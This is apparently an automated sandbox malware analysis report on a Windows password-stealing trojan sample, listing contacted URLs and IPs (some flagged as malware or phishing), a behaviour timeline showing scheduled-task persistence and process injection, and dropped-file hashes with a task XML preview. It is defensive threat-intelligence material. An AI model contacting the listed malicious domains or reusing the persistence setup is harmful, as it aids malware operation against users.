SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392020681.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392926230.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392117186.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392383105.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392213201.0000000005757000.00000004.00000020.00020000.00000000.sdmp, 
SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392322140.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392547177.0000000005757000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.jiyu-kobo.co.jp/sSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.dulichphucbinh.com/co63/www.f1-austin-tickets.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.freepad168.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.inf9obase.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.mattewigs.com/co63/www.dulichphucbinh.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.myccsmartmove.com/co63/www.takealicense.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.dlafluid.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.naspewt.xyz/co63/www.mattewigs.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: phishing
                                              unknown
                                              http://www.cucinainvenice.comReferer:explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.sajatypeworks.com-SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.387837697.000000000575B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              low
                                              http://www.fontbureau.com/designersGSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.fontbureau.com/designers/?SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.394212105.000000000575A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.founder.com.cn/cn/bTheSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers?SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.jiyu-kobo.co.jp/jp/HSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.saleschildcarriers.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.groexplorer.exe, 0000000F.00000000.478178422.00007FFA13109000.00000002.00000001.01000000.0000000B.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.vestostore.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.pym479.comReferer:explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.tiro.comSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.goodfont.co.krSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.inf9obase.com/co63/www.cucinainvenice.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.jiyu-kobo.co.jp/jp/=SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.cucinainvenice.com/co63/explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
IP | Domain | Country | ASN | ASN Name | Malicious
76.223.26.96 | 342284.parkingcrew.net | United States | 16509 | AMAZON-02US | false
184.94.215.140 | www.naspewt.xyz | United States | 394896 | VXCHNGE-NC01US | true
152.199.21.175 | sni1gl.wpc.lambdacdn.net | United States | 15133 | EDGECASTUS | true
34.102.136.180 | dlafluid.com | United States | 15169 | GOOGLEUS | false
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
34.149.87.45 | td-ccm-neg-87-45.wixdns.net | United States | 2686 | ATGS-MMD-ASUS | true
86.38.202.187 | vestostore.com | Lithuania | 15419 | LRTC-ASLT | true
172.67.215.254 | www.saleschildcarriers.com | United States | 13335 | CLOUDFLARENETUS | true
                                                      Joe Sandbox Version:38.0.0 Beryl
                                                      Analysis ID:1276619
                                                      Start date and time:2023-07-20 11:42:08 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 14m 1s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:19
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample file name:SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@23/18@8/8
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:
                                                      • Successful, ratio: 43.2% (good quality ratio 41.5%)
                                                      • Quality average: 68.8%
                                                      • Quality standard deviation: 29.2%
                                                      HCA Information:
                                                      • Successful, ratio: 99%
                                                      • Number of executed functions: 64
                                                      • Number of non-executed functions: 236
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240s for rundll32
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
                                                      • Excluded domains from analysis (whitelisted): 4zmf1gx83y.azureedge.net, ctldl.windowsupdate.com, 4zmf1gx83y.ec.azureedge.net
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • VT rate limit hit for: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
Time | Type | Description
11:43:14 | API Interceptor | 1x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe modified
11:43:17 | API Interceptor | 49x Sleep call for process: powershell.exe modified
11:43:18 | Task Scheduler | Run new task: hkkRsa path: C:\Users\user\AppData\Roaming\hkkRsa.exe
11:43:31 | API Interceptor | 1x Sleep call for process: hkkRsa.exe modified
11:43:45 | API Interceptor | 1458x Sleep call for process: explorer.exe modified
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.355304211458859
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                      MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                      SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                      SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                      SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                      Malicious:true
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                      Process:C:\Users\user\AppData\Roaming\hkkRsa.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.355304211458859
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                      MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                      SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                      SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                      SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                      Process:C:\Windows\explorer.exe
                                                      File Type:JSON data
                                                      Category:dropped
                                                      Size (bytes):984
                                                      Entropy (8bit):5.2414849034866355
                                                      Encrypted:false
                                                      SSDEEP:24:Yq6CUXyhmbmPlbNdB6hmYmPlz0JahmNmPlHZ6T06Mhm6mPlbxdB6hm3mPl7KTdB2:YqDUXycSNbNdUcVNz0JacQNHZ6T06Mcs
                                                      MD5:4816271302882BDFB06EE40F624169D1
                                                      SHA1:A8F07F0A5940C4A9D4DAD112787FE109CCACA869
                                                      SHA-256:26D30DFFC5E2C493FF97B32C775C98630F0466D49144778BAE2688BA0716C760
                                                      SHA-512:3D46AA6777AF386524E65D8D158201B699F766A5640A3E917CFA78E337475F910A839B93E0097C6651D2FCBE02ED7BFAF9EF8274C9632A88D06985168087823B
                                                      Malicious:false
                                                      Preview:{"RecentItems":[{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":4155601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4145601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":4135601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":4125601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4115601904,"LastSwitchedHighPart":30747926,"PrePopulated":true},{"AppID":"Microsoft.Getstarted_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":4105601904,"LastSwitchedHighPart":30747926,"PrePopulated":true}]}
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):21764
                                                      Entropy (8bit):5.599714992647357
                                                      Encrypted:false
                                                      SSDEEP:384:CtCRqq0qLVAbu8g07bCzcVSVxnkNyiJ9g9SJ3uyV1Rm0ZWAVrdI9RRaA+inY8:pCi8gCvUxkNi9cuCrF8
                                                      MD5:B27C94FA49836AAD095FDB5C8EC5A186
                                                      SHA1:A5213DF036F6D59D50932B381E5FB0D23407EAD7
                                                      SHA-256:FBF98077B36A333F2F904D3D8C74A4CA13B355CA803591A72D46A19B81A52EE1
                                                      SHA-512:B1BC1D867E36BA5717702FBD2C4AAC89214E3CF617B6C85D343C5080C5DD742ED10A355B41F703715AA1AB44B4D32B6E5C1F299117EF4444CB6E4F314414FAE5
                                                      Malicious:false
                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
                                                      Category:dropped
                                                      Size (bytes):49152
                                                      Entropy (8bit):0.7876734657715041
                                                      Encrypted:false
                                                      SSDEEP:48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
                                                      MD5:CF7758A2FF4A94A5D589DEBAED38F82E
                                                      SHA1:D3380E70D0CAEB9AD78D14DD970EA480E08232B8
                                                      SHA-256:6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
                                                      SHA-512:1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
                                                      Malicious:true
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:U:U
                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                      Malicious:false
                                                      Preview:1
                                                      Process:C:\Users\user\AppData\Roaming\hkkRsa.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1597
                                                      Entropy (8bit):5.122974410982801
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh/a1Kby1moqUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaxvn:cgeCaYrFdOFzOzN33ODOiDdKrsuTuv
                                                      MD5:F66A4254B33D01F2D6FE272618551EBA
                                                      SHA1:F03B785354A6775EECECA1C7C7128CB2102769ED
                                                      SHA-256:FB97963AC638766734F4BFBA17EDF657EDC8410D379F42F41AE74C63E10415F9
                                                      SHA-512:2EC6EFE13CB7F2E368698DED78E6281718743E4F95E34308821336A06480DCC30C7EB30667D68D7C9CB8657B60E45B627E13B1FC7BBF0C5B81D59C367A727324
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1597
                                                      Entropy (8bit):5.122974410982801
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh/a1Kby1moqUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaxvn:cgeCaYrFdOFzOzN33ODOiDdKrsuTuv
                                                      MD5:F66A4254B33D01F2D6FE272618551EBA
                                                      SHA1:F03B785354A6775EECECA1C7C7128CB2102769ED
                                                      SHA-256:FB97963AC638766734F4BFBA17EDF657EDC8410D379F42F41AE74C63E10415F9
                                                      SHA-512:2EC6EFE13CB7F2E368698DED78E6281718743E4F95E34308821336A06480DCC30C7EB30667D68D7C9CB8657B60E45B627E13B1FC7BBF0C5B81D59C367A727324
                                                      Malicious:true
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                      Process:C:\Windows\SysWOW64\rundll32.exe
